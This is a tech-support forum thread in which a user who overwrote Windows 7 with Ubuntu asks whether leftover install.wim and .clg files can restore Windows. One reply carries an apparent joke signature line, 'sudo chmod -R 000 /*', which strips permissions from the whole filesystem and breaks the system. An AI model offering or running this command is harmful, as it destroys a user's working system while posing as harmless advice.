ISO Help? Broken Windows

I was going though my computer and I found a install.wim file (files size is 2GB) and a install_Windows7PROFESSIONAL.clg file (1 MB) I tried to install Ubuntu 14.04 LTS and for some reason It broke the loader for windows so I just installed Ubuntu. I have these on a Flash Drive. I don't like this anymore so is there any way these are restore files? If so what should I do. If not what are they and what do they do. Please help as I need windows back desperately. (Computer is an HP Brobook 4420s was running Windows 7 Pro 64-bit now running Ubuntu 14.04 LTS 64-bit)

Ran by coffee

Is it just me, or am I looking at a double post? If nobody answered it's probably because they don't know, double posting won't help. If you formated the drive you can't get windows back unless you resinstall it. Try calling hp support, they should be willing to provide you a new windows key.

Don't ask to ask, just ask... please 🤨

sudo chmod -R 000 /*

I'm sorry I'm new here and though I was putting it under different places for help I'm sorry for the spam and I have the two ISO files I was would like to know how to execute them together

Ran by coffee